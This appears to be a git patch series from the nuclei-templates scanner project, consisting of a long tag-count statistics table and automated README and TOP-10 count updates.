+| bsphp | 1 | | | | | | | | | +| plainviewplugins | 1 | | | | | | | | | +| sensu | 1 | | | | | | | | | +| pacs | 1 | | | | | | | | | +| omni | 1 | | | | | | | | | +| reality | 1 | | | | | | | | | +| memory-pipes | 1 | | | | | | | | | +| garage_management_system_project | 1 | | | | | | | | | +| collibra | 1 | | | | | | | | | +| cybernetikz | 1 | | | | | | | | | +| activehelper | 1 | | | | | | | | | +| dbt | 1 | | | | | | | | | +| badgeos | 1 | | | | | | | | | +| luci | 1 | | | | | | | | | +| zentral | 1 | | | | | | | | | +| streamelements | 1 | | | | | | | | | +| alcatel-lucent | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| girlfriendsmeet | 1 | | | | | | | | | +| npmjs | 1 | | | | | | | | | +| captcha | 1 | | | | | | | | | +| libre-office | 1 | | | | | | | | | +| independent-academia | 1 | | | | | | | | | +| interactsoftware | 1 | | | | | | | | | +| cron | 1 | | | | | | | | | +| flowcode | 1 | | | | | | | | | +| hoteldrui | 1 | | | | | | | | | +| vite | 1 | | | | | | | | | +| gerapy | 1 | | | | | | | | | +| mastodon-climatejusticerocks | 1 | | | | | | | | | +| charity | 1 | | | | | | | | | +| urlscan | 1 | | | | | | | | | +| affiliatefeeds | 1 | | | | | | | | | +| employee_records_system_project | 1 | | | | | | | | | +| lorsh-mastodon-instance | 1 | | | | | | | | | +| pdflayer | 1 | | | | | | | | | +| redfish | 1 | | | | | | | | | +| glodon | 1 | | | | | | | | | +| treeview | 1 | | | | | | | | | +| atutor | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| arangodb | 1 | | | | | | | | | +| tribe29 | 1 | | | | | | | | | +| coinapi | 1 | | | | | | | | | +| bookcrossing | 1 | | | | | | | | | +| officekeeper | 1 | | | | | | | | | +| dotcards | 1 | | | | | | | | | +| clockify | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| labtech_software | 1 | | | | | | | | | +| on-prem | 1 | | | | | | | | | +| Microsoft | 1 | | | | | | | | | +| impala | 1 | | | | | | | | | +| breach-forums | 1 | | | | | | | | | +| clubhouse | 1 | | | | | | | | | | secure-copy-content-protection | 1 | | | | | | | | | +| hc-custom-wp-admin-url | 1 | | | | | | | | | +| ictprotege | 1 | | | | | | | | | +| mobotix | 1 | | | | | | | | | +| cubecoders | 1 | | | | | | | | | +| user-management | 1 | | | | | | | | | +| motopress | 1 | | | | | | | | | +| saltgui | 1 | | | | | | | | | +| celebrus | 1 | | | | | | | | | +| infusionsoft_project | 1 | | | | | | | | | +| fractalia | 1 | | | | | | | | | +| giters | 1 | | | | | | | | | +| apiflash | 1 | | | | | | | | | +| faktopedia | 1 | | | | | | | | | +| minds | 1 | | | | | | | | | +| xfinity | 1 | | | | | | | | | +| ollama | 1 | | | | | | | | | +| easy-student-results | 1 | | | | | | | | | +| smartofficepayroll | 1 | | | | | | | | | +| imm | 1 | | | | | | | | | +| target | 1 | | | | | | | | | +| ares | 1 | | | | | | | | | +| yunanbao | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| nsq | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| extplorer | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| firefox | 1 | | | | | | | | | +| roboform | 1 | | | | | | | | | +| webeditors | 1 | | | | | | | | | +| g-auto-hyperlink | 1 | | | | | | | | | +| txjia | 1 | | | | | | | | | +| wp_live_chat_shoutbox_project | 1 | | | | | | | | | +| marshmallow | 1 | | | | | | | | | +| adoptapet | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| vagrant | 1 | | | | | | | | | +| give | 1 | | | | | | | | | +| clickjacking | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| jupyterlab | 1 | | | | | | | | | +| mastodon-eu-voice | 1 | | | | | | | | | +| opennebula | 1 | | | | | | | | | +| udraw | 1 | | | | | | | | | +| smartertools | 1 | | | | | | | | | +| header | 1 | | | | | | | | | +| wpswings | 1 | | | | | | | | | +| checklist | 1 | | | | | | | | | +| raspberry | 1 | | | | | | | | | +| jsmol2wp | 1 | | | | | | | | | +| bws-adminpage | 1 | | | | | | | | | +| oas | 1 | | | | | | | | | +| zkoss | 1 | | | | | | | | | +| psalm | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| mx | 1 | | | | | | | | | +| sassy | 1 | | | | | | | | | +| eibiz | 1 | | | | | | | | | +| slackholes | 1 | | | | | | | | | +| accent | 1 | | | | | | | | | +| thedogapi | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| arprice-responsive-pricing-table | 1 | | | | | | | | | +| joomlatag | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| shadoweb | 1 | | | | | | | | | +| searchwp-live-ajax-search | 1 | | | | | | | | | +| mcvie | 1 | | | | | | | | | +| wildcard | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| quitterpl | 1 | | | | | | | | | +| divido | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| mystrom | 1 | | | | | | | | | +| proton | 1 | | | | | | | | | +| zm-gallery_project | 1 | | | | | | | | | +| bws-realty | 1 | | | | | | | | | +| qizhi | 1 | | | | | | | | | +| winscp | 1 | | | | | | | | | +| rockettheme | 1 | | | | | | | | | +| jc6 | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| openmediavault | 1 | | | | | | | | | +| albicla | 1 | | | | | | | | | +| sunhillo | 1 | | | | | | | | | +| zerodium | 1 | | | | | | | | | +| eos | 1 | | | | | | | | | +| vcloud | 1 | | | | | | | | | +| themefusion | 1 | | | | | | | | | +| groupware | 1 | | | | | | | | | +| fiberhome | 1 | | | | | | | | | +| 2kblater | 1 | | | | | | | | | +| code-atlantic | 1 | | | | | | | | | +| panda | 1 | | | | | | | | | +| deeplink | 1 | | | | | | | | | +| phacility | 1 | | | | | | | | | +| dapp | 1 | | | | | | | | | +| wiren | 1 | | | | | | | | | +| omlet | 1 | | | | | | | | | +| metaview | 1 | | | | | | | | | +| givesight | 1 | | | | | | | | | +| joomlamart | 1 | | | | | | | | | +| dynamic | 1 | | | | | | | | | +| netman | 1 | | | | | | | | | +| meteor | 1 | | | | | | | | | +| themeinprogress | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| nessus | 1 | | | | | | | | | +| gocron | 1 | | | | | | | | | +| neocase | 1 | | | | | | | | | +| xyxel | 1 | | | | | | | | | +| ovpn | 1 | | | | | | | | | +| lumis | 1 | | | | | | | | | +| putty | 1 | | | | | | | | | +| joomlanook | 1 | | | | | | | | | +| lin-cms | 1 | | | | | | | | | +| min | 1 | | | | | | | | | +| oturia | 1 | | | | | | | | | +| instructables | 1 | | | | | | | | | +| blueiris | 1 | | | | | | | | | +| wd | 1 | | | | | | | | | +| ddownload | 1 | | | | | | | | | +| tianqing | 1 | | | | | | | | | +| ip-series | 1 | | | | | | | | | +| media-library-assistant | 1 | | | | | | | | | +| ltrace | 1 | | | | | | | | | +| caa | 1 | | | | | | | | | +| xvideos-profiles | 1 | | | | | | | | | +| wpserveur | 1 | | | | | | | | | +| siteengine | 1 | | | | | | | | | +| fuji | 1 | | | | | | | | | +| latency | 1 | | | | | | | | | +| seber | 1 | | | | | | | | | +| codestats | 1 | | | | | | | | | +| ubigeo_de_peru_para_woocommerce_project | 1 | | | | | | | | | +| fortiddos | 1 | | | | | | | | | +| devalcms | 1 | | | | | | | | | +| tbk | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| pelco | 1 | | | | | | | | | +| 3dm2 | 1 | | | | | | | | | +| fancentro | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| zzzphp | 1 | | | | | | | | | +| patton | 1 | | | | | | | | | +| acsoft | 1 | | | | | | | | | +| vue | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| chronos | 1 | | | | | | | | | +| kuma | 1 | | | | | | | | | +| cloud-box | 1 | | | | | | | | | +| socat | 1 | | | | | | | | | +| visual-tools | 1 | | | | | | | | | +| teltonika | 1 | | | | | | | | | +| synametrics | 1 | | | | | | | | | +| zuul | 1 | | | | | | | | | +| brave | 1 | | | | | | | | | +| stms | 1 | | | | | | | | | +| tiempo | 1 | | | | | | | | | +| member-hero | 1 | | | | | | | | | +| patientslikeme | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| dotnetcms | 1 | | | | | | | | | +| authorstream | 1 | | | | | | | | | +| filetransfer | 1 | | | | | | | | | +| nevma | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| duolingo | 1 | | | | | | | | | +| darkcomet | 1 | | | | | | | | | +| slims | 1 | | | | | | | | | +| count_per_day_project | 1 | | | | | | | | | +| coder | 1 | | | | | | | | | +| pulsar360 | 1 | | | | | | | | | +| teamtreehouse | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| rainbow_portal | 1 | | | | | | | | | +| cartabandonmentpro | 1 | | | | | | | | | +| freehtmldesigns | 1 | | | | | | | | | +| groupib | 1 | | | | | | | | | +| geth | 1 | | | | | | | | | +| download-monitor | 1 | | | | | | | | | +| contact-form-multi | 1 | | | | | | | | | +| phpnow | 1 | | | | | | | | | +| promodj | 1 | | | | | | | | | +| bws-user-role | 1 | | | | | | | | | +| bangresto_project | 1 | | | | | | | | | +| xbackbone | 1 | | | | | | | | | +| leadpages | 1 | | | | | | | | | +| malwarebazaar | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| clearfy-cache | 1 | | | | | | | | | +| bws-sender | 1 | | | | | | | | | +| chomikujpl | 1 | | | | | | | | | +| sevone | 1 | | | | | | | | | +| cube105 | 1 | | | | | | | | | +| designspriation | 1 | | | | | | | | | +| zhihu | 1 | | | | | | | | | +| metform | 1 | | | | | | | | | +| heylink | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| meshcentral | 1 | | | | | | | | | +| joomlaworks | 1 | | | | | | | | | +| isams | 1 | | | | | | | | | +| ko-fi | 1 | | | | | | | | | +| furiffic | 1 | | | | | | | | | +| freepbx | 1 | | | | | | | | | +| spiceworks | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| ninja-forms | 1 | | | | | | | | | +| kindsoft | 1 | | | | | | | | | +| extremenetworks | 1 | | | | | | | | | +| midasolutions | 1 | | | | | | | | | +| codeermeneer | 1 | | | | | | | | | +| membership-database | 1 | | | | | | | | | +| advanced_comment_system_project | 1 | | | | | | | | | +| poweredbygaysocial-mastodon-instance | 1 | | | | | | | | | +| avnil-pdf | 1 | | | | | | | | | +| emessage | 1 | | | | | | | | | +| invoice | 1 | | | | | | | | | +| xeams | 1 | | | | | | | | | +| sefile | 1 | | | | | | | | | +| locust | 1 | | | | | | | | | +| talroo | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| ligeo | 1 | | | | | | | | | +| contactossex | 1 | | | | | | | | | +| ulubpl | 1 | | | | | | | | | +| pingdom | 1 | | | | | | | | | +| newsscript | 1 | | | | | | | | | +| niteothemes | 1 | | | | | | | | | +| rsb | 1 | | | | | | | | | +| litmindclub-mastodon-instance | 1 | | | | | | | | | +| codis | 1 | | | | | | | | | +| headers | 1 | | | | | | | | | +| cracked-io | 1 | | | | | | | | | +| hardy-barth | 1 | | | | | | | | | +| provectus | 1 | | | | | | | | | +| parler-archived-posts | 1 | | | | | | | | | +| keepass | 1 | | | | | | | | | +| cdi | 1 | | | | | | | | | +| csh | 1 | | | | | | | | | +| sash | 1 | | | | | | | | | +| udemy | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| caldotcom | 1 | | | | | | | | | +| oneidentity | 1 | | | | | | | | | +| yuba | 1 | | | | | | | | | +| ibenic | 1 | | | | | | | | | +| eventespresso | 1 | | | | | | | | | +| jeuxvideo | 1 | | | | | | | | | +| netscaller | 1 | | | | | | | | | +| rebuild | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| chanjettplus | 1 | | | | | | | | | +| node-srv_project | 1 | | | | | | | | | +| dragonfly_project | 1 | | | | | | | | | +| daily_prayer_time_project | 1 | | | | | | | | | +| eureka | 1 | | | | | | | | | +| biostar | 1 | | | | | | | | | +| icc-pro | 1 | | | | | | | | | +| qmail_project | 1 | | | | | | | | | +| aaha-chat | 1 | | | | | | | | | +| kik | 1 | | | | | | | | | +| vimeo | 1 | | | | | | | | | +| megatech | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| bqe | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| event_management_system_project | 1 | | | | | | | | | +| playtube | 1 | | | | | | | | | +| qualtrics | 1 | | | | | | | | | +| tapitag | 1 | | | | | | | | | +| looneytunables | 1 | | | | | | | | | +| swim_team_project | 1 | | | | | | | | | +| pluginbazaar | 1 | | | | | | | | | +| label-studio | 1 | | | | | | | | | +| engage | 1 | | | | | | | | | +| showcase | 1 | | | | | | | | | +| gpon | 1 | | | | | | | | | +| quixplorer | 1 | | | | | | | | | +| goodlayerslms | 1 | | | | | | | | | +| intellifuel | 1 | | | | | | | | | +| tootingch-mastodon-instance | 1 | | | | | | | | | +| codebase | 1 | | | | | | | | | +| mailoney | 1 | | | | | | | | | +| remoting | 1 | | | | | | | | | +| poshmark | 1 | | | | | | | | | +| justfans | 1 | | | | | | | | | +| rollupjs | 1 | | | | | | | | | +| deployment | 1 | | | | | | | | | +| genie | 1 | | | | | | | | | +| flock | 1 | | | | | | | | | +| cookex | 1 | | | | | | | | | +| insanejournal | 1 | | | | | | | | | +| noptin | 1 | | | | | | | | | +| helloprint | 1 | | | | | | | | | +| erlang | 1 | | | | | | | | | +| filezilla | 1 | | | | | | | | | +| bblog-ru | 1 | | | | | | | | | +| bandlab | 1 | | | | | | | | | +| thecatapi | 1 | | | | | | | | | +| homeautomation | 1 | | | | | | | | | +| gozi | 1 | | | | | | | | | +| scoutwiki | 1 | | | | | | | | | +| ebird | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| openethereum | 1 | | | | | | | | | +| cliniccases | 1 | | | | | | | | | +| apollotheme | 1 | | | | | | | | | +| mitric | 1 | | | | | | | | | +| smelsy | 1 | | | | | | | | | +| hangfire | 1 | | | | | | | | | +| communilink | 1 | | | | | | | | | +| online_security_guards_hiring_system_project | 1 | | | | | | | | | +| autoset | 1 | | | | | | | | | +| najeebmedia | 1 | | | | | | | | | +| instructure | 1 | | | | | | | | | +| xproxy | 1 | | | | | | | | | +| ticket-master | 1 | | | | | | | | | +| distance | 1 | | | | | | | | | +| campaignmonitor | 1 | | | | | | | | | +| cowrie | 1 | | | | | | | | | +| saracartershow | 1 | | | | | | | | | +| mastodon-meowsocial | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| commoninja | 1 | | | | | | | | | +| wp-helper-lite | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| secui | 1 | | | | | | | | | +| coinmarketcap | 1 | | | | | | | | | +| reblogme | 1 | | | | | | | | | +| rsshub | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| admin-font-editor_project | 1 | | | | | | | | | +| satellian | 1 | | | | | | | | | | microfinance_management_system_project | 1 | | | | | | | | | +| auru | 1 | | | | | | | | | +| hometechsocial-mastodon-instance | 1 | | | | | | | | | +| admidio | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| smtp2go | 1 | | | | | | | | | +| xz | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| dwsync | 1 | | | | | | | | | +| feedwordpress_project | 1 | | | | | | | | | +| spreadsheet-reader | 1 | | | | | | | | | +| alma | 1 | | | | | | | | | +| twisted | 1 | | | | | | | | | +| aj-report | 1 | | | | | | | | | +| nh | 1 | | | | | | | | | +| fortimanager | 1 | | | | | | | | | +| phabricator | 1 | | | | | | | | | +| message-me | 1 | | | | | | | | | +| teespring | 1 | | | | | | | | | +| drum | 1 | | | | | | | | | +| mflow | 1 | | | | | | | | | +| atvise | 1 | | | | | | | | | +| openhab | 1 | | | | | | | | | +| phpbb | 1 | | | | | | | | | +| osint-image | 1 | | | | | | | | | +| phpdebug | 1 | | | | | | | | | +| basixonline | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| ds_store | 1 | | | | | | | | | +| caringbridge | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| aviary_image_editor_add-on_for_gravity_forms_project | 1 | | | | | | | | | +| querysol | 1 | | | | | | | | | +| cults3d | 1 | | | | | | | | | +| incapptic-connect | 1 | | | | | | | | | +| management | 1 | | | | | | | | | +| cowboy | 1 | | | | | | | | | +| packetstrom | 1 | | | | | | | | | +| infoleak | 1 | | | | | | | | | +| redgifs | 1 | | | | | | | | | +| moto-treks | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| bitcoin-forum | 1 | | | | | | | | | +| ciprianmp | 1 | | | | | | | | | +| terraboard | 1 | | | | | | | | | +| eclipsebirt | 1 | | | | | | | | | +| documentcloud | 1 | | | | | | | | | +| openbullet | 1 | | | | | | | | | +| proofpoint | 1 | | | | | | | | | +| strider | 1 | | | | | | | | | +| https | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| vgm | 1 | | | | | | | | | +| htmlcoderhelper | 1 | | | | | | | | | +| bueltge | 1 | | | | | | | | | +| labstack | 1 | | | | | | | | | +| rustici | 1 | | | | | | | | | +| manyvids | 1 | | | | | | | | | +| lighter | 1 | | | | | | | | | +| helmet_store_showroom_site_project | 1 | | | | | | | | | +| maximo | 1 | | | | | | | | | +| skyscanner | 1 | | | | | | | | | +| snapchat-stories | 1 | | | | | | | | | +| b2bbuilder | 1 | | | | | | | | | +| fotka | 1 | | | | | | | | | +| external-media-without-import | 1 | | | | | | | | | +| ifeelweb | 1 | | | | | | | | | +| apsystems | 1 | | | | | | | | | +| kasm | 1 | | | | | | | | | +| rtm-web | 1 | | | | | | | | | +| impresspages | 1 | | | | | | | | | +| pexec | 1 | | | | | | | | | +| wptrafficanalyzer | 1 | | | | | | | | | +| piluscart | 1 | | | | | | | | | +| elmah | 1 | | | | | | | | | +| fielupload | 1 | | | | | | | | | +| age-gate | 1 | | | | | | | | | +| db2 | 1 | | | | | | | | | +| front | 1 | | | | | | | | | +| igromania | 1 | | | | | | | | | +| careerhabr | 1 | | | | | | | | | +| mnt-tech | 1 | | | | | | | | | +| disneyplus | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| netmask_project | 1 | | | | | | | | | +| ogc | 1 | | | | | | | | | +| lotus_core_cms_project | 1 | | | | | | | | | +| torchbox | 1 | | | | | | | | | +| tastyigniter | 1 | | | | | | | | | +| v2x | 1 | | | | | | | | | +| vip-blog | 1 | | | | | | | | | +| kmc_information_systems | 1 | | | | | | | | | +| wptaskforce | 1 | | | | | | | | | +| robot-cpa | 1 | | | | | | | | | +| wp-buy | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| neobox | 1 | | | | | | | | | +| voicescom | 1 | | | | | | | | | +| wikidot | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| commerce | 1 | | | | | | | | | +| gianni_tommasi | 1 | | | | | | | | | +| pivotal_software | 1 | | | | | | | | | +| oam | 1 | | | | | | | | | +| rsvpmaker | 1 | | | | | | | | | +| magabook | 1 | | | | | | | | | +| ymhome | 1 | | | | | | | | | +| frontend_uploader_project | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| mylittleadmin | 1 | | | | | | | | | +| nconf | 1 | | | | | | | | | +| mycloud | 1 | | | | | | | | | +| apex-legends | 1 | | | | | | | | | +| mailboxvalidator | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| macos-bella | 1 | | | | | | | | | +| raiden | 1 | | | | | | | | | +| ektron | 1 | | | | | | | | | +| n-media-woocommerce-checkout-fields | 1 | | | | | | | | | +| jsconfig | 1 | | | | | | | | | +| box | 1 | | | | | | | | | +| containers | 1 | | | | | | | | | +| retool | 1 | | | | | | | | | +| simple_client_management_system_project | 1 | | | | | | | | | +| tmate | 1 | | | | | | | | | +| masselink | 1 | | | | | | | | | +| distcc | 1 | | | | | | | | | +| wp-shoutbox-live-chat | 1 | | | | | | | | | +| user-meta | 1 | | | | | | | | | +| satis | 1 | | | | | | | | | +| mobiproxy | 1 | | | | | | | | | +| zoomeye | 1 | | | | | | | | | +| simple-link-directory | 1 | | | | | | | | | +| quick-event-manager | 1 | | | | | | | | | +| opgg | 1 | | | | | | | | | +| mws | 1 | | | | | | | | | +| office | 1 | | | | | | | | | +| airee | 1 | | | | | | | | | +| accellion | 1 | | | | | | | | | +| ilovegrowingmarijuana | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| lgate | 1 | | | | | | | | | +| akeeba | 1 | | | | | | | | | +| cachet | 1 | | | | | | | | | +| opache | 1 | | | | | | | | | +| x-ui | 1 | | | | | | | | | +| aquasec | 1 | | | | | | | | | +| wp-upg | 1 | | | | | | | | | +| algolplus | 1 | | | | | | | | | +| controlled-admin-access | 1 | | | | | | | | | +| g5theme | 1 | | | | | | | | | +| cybercompany | 1 | | | | | | | | | +| spnego | 1 | | | | | | | | | +| snipe-it | 1 | | | | | | | | | +| bws-promobar | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| xvideos-models | 1 | | | | | | | | | +| rackup | 1 | | | | | | | | | +| node-red | 1 | | | | | | | | | +| csv | 1 | | | | | | | | | +| ncast | 1 | | | | | | | | | +| symmetricom | 1 | | | | | | | | | +| threatq | 1 | | | | | | | | | +| ocean-extra | 1 | | | | | | | | | +| registrationmagic | 1 | | | | | | | | | +| caton | 1 | | | | | | | | | +| searchreplacedb2 | 1 | | | | | | | | | +| deezer | 1 | | | | | | | | | +| mapmytracks | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| pucit.edu | 1 | | | | | | | | | +| tracker | 1 | | | | | | | | | +| babypips | 1 | | | | | | | | | +| huiwen | 1 | | | | | | | | | +| graphpaperpress | 1 | | | | | | | | | +| secsslvpn | 1 | | | | | | | | | +| raygun | 1 | | | | | | | | | +| szmerinfo | 1 | | | | | | | | | +| setlistfm | 1 | | | | | | | | | +| properfraction | 1 | | | | | | | | | +| sentinelone | 1 | | | | | | | | | +| ultimatemember | 1 | | | | | | | | | +| searchwp | 1 | | | | | | | | | +| mura | 1 | | | | | | | | | +| kopano | 1 | | | | | | | | | +| mara_cms_project | 1 | | | | | | | | | +| iucn | 1 | | | | | | | | | +| conpot | 1 | | | | | | | | | +| pexip | 1 | | | | | | | | | +| questdb | 1 | | | | | | | | | +| mintme | 1 | | | | | | | | | +| softr | 1 | | | | | | | | | +| nimplant | 1 | | | | | | | | | +| oglaszamy24hpl | 1 | | | | | | | | | +| pillowfort | 1 | | | | | | | | | +| cdist | 1 | | | | | | | | | +| sourcemaps | 1 | | | | | | | | | +| phonepe | 1 | | | | | | | | | +| tutor | 1 | | | | | | | | | +| exposed | 1 | | | | | | | | | +| fiverr | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| biostar2 | 1 | | | | | | | | | +| wpaffiliatemanager | 1 | | | | | | | | | +| ansi_up_project | 1 | | | | | | | | | +| land-software | 1 | | | | | | | | | +| anaqua | 1 | | | | | | | | | +| hookbot | 1 | | | | | | | | | +| crunchrat | 1 | | | | | | | | | +| codemiq | 1 | | | | | | | | | +| hanta | 1 | | | | | | | | | +| casemanager | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| recly | 1 | | | | | | | | | +| tar | 1 | | | | | | | | | +| vironeer | 1 | | | | | | | | | +| x-ray | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| nozomi | 1 | | | | | | | | | +| jeecg_p3_biz_chat_project | 1 | | | | | | | | | +| contus-video-gallery | 1 | | | | | | | | | +| genieaccess | 1 | | | | | | | | | +| backup-guard | 1 | | | | | | | | | +| mastodon-chaossocial | 1 | | | | | | | | | +| agilecrm | 1 | | | | | | | | | +| vsftpd_project | 1 | | | | | | | | | +| la-souris-verte | 1 | | | | | | | | | +| fedoraproject | 1 | | | | | | | | | +| workspace | 1 | | | | | | | | | +| boostifythemes | 1 | | | | | | | | | +| bscw | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| joinmastodon | 1 | | | | | | | | | +| crypto | 1 | | | | | | | | | +| uid | 1 | | | | | | | | | +| xray | 1 | | | | | | | | | +| kaseya | 1 | | | | | | | | | +| joget | 1 | | | | | | | | | +| core-dump | 1 | | | | | | | | | +| jspxcms | 1 | | | | | | | | | +| scoreme_project | 1 | | | | | | | | | +| layer5 | 1 | | | | | | | | | +| ccm | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| scratch | 1 | | | | | | | | | +| digitalspy | 1 | | | | | | | | | +| pluginops | 1 | | | | | | | | | +| photoblocks-gallery | 1 | | | | | | | | | +| beardev | 1 | | | | | | | | | +| misp | 1 | | | | | | | | | +| signet | 1 | | | | | | | | | +| advfn | 1 | | | | | | | | | +| goliath | 1 | | | | | | | | | +| khodrochi | 1 | | | | | | | | | +| personal-dictionary | 1 | | | | | | | | | +| plurk | 1 | | | | | | | | | +| workerman | 1 | | | | | | | | | +| blipfm | 1 | | | | | | | | | +| gist | 1 | | | | | | | | | +| airnotifier | 1 | | | | | | | | | +| donation-alerts | 1 | | | | | | | | | +| spirit | 1 | | | | | | | | | +| flarum | 1 | | | | | | | | | +| syncthing | 1 | | | | | | | | | +| nzbget | 1 | | | | | | | | | +| musiciansocial-mastodon-instance | 1 | | | | | | | | | +| roundupwp | 1 | | | | | | | | | +| chimpgroup | 1 | | | | | | | | | +| avatier | 1 | | | | | | | | | +| anobii | 1 | | | | | | | | | +| secnet-ac | 1 | | | | | | | | | +| etherscan | 1 | | | | | | | | | +| evilginx | 1 | | | | | | | | | +| cutesoft | 1 | | | | | | | | | +| icearp | 1 | | | | | | | | | +| c4 | 1 | | | | | | | | | +| zblog | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| silenttrinity | 1 | | | | | | | | | +| pirelli | 1 | | | | | | | | | +| urbackup | 1 | | | | | | | | | +| ifttt | 1 | | | | | | | | | +| customize-login-image | 1 | | | | | | | | | +| time | 1 | | | | | | | | | +| opms | 1 | | | | | | | | | +| wpcoursesplugin | 1 | | | | | | | | | +| wannacry | 1 | | | | | | | | | +| google_adsense_project | 1 | | | | | | | | | +| davantis | 1 | | | | | | | | | +| pokemonshowdown | 1 | | | | | | | | | +| secure-donation | 1 | | | | | | | | | +| signal | 1 | | | | | | | | | +| hec | 1 | | | | | | | | | +| media-server | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| trassir | 1 | | | | | | | | | +| colourlovers | 1 | | | | | | | | | +| microsoft | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 8225785ef2..223d83e311 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,9 +1,9 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2510 | dhiyaneshdk | 1322 | http | 7546 | info | 3697 | file | 337 | +| cve | 2511 | dhiyaneshdk | 1322 | http | 7547 | info | 3697 | file | 337 | | panel | 1157 | daffainfo | 865 | file | 337 | high | 1770 | dns | 25 | -| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | http | 2 | -| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1043 | | | +| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | | | +| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1044 | | | | xss | 911 | ritikchaddha | 354 | cloud | 99 | low | 265 | | | | wp-plugin | 852 | pikpikcu | 353 | code | 81 | unknown | 39 | | | | osint | 804 | pdteam | 297 | javascript | 60 | | | | | From 3914b7f2b62ec9307b5bbb1e4392a2b9c7ea3c69 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jun 2024 19:55:10 +0000 Subject: [PATCH 0081/1841] Auto README Update [Sun Jun 9 19:55:10 UTC 2024] :robot: --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 280fe9265f..5941d08a8f 100644 --- a/README.md +++ b/README.md @@ -42,10 +42,10 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2510 | dhiyaneshdk | 1322 | http | 7546 | info | 3697 | file | 337 | +| cve | 2511 | dhiyaneshdk | 1322 | http | 7547 | info | 3697 | file | 337 | | panel | 1157 | daffainfo | 865 | file | 337 | high | 1770 | dns | 25 | -| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | http | 2 | -| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1043 | | | +| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | | | +| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1044 | | | | xss | 911 | ritikchaddha | 354 | cloud | 99 | low | 265 | | | | wp-plugin | 852 | pikpikcu | 353 | code | 81 | unknown | 39 | | | | osint | 804 | pdteam | 297 | javascript | 60 | | | | | @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | lfi | 662 | ricardomaia | 232 | dns | 22 | | | | | | misconfig | 659 | geeknik | 231 | dast | 21 | | | | | -**649 directories, 8827 files**. +**649 directories, 8828 files**. From 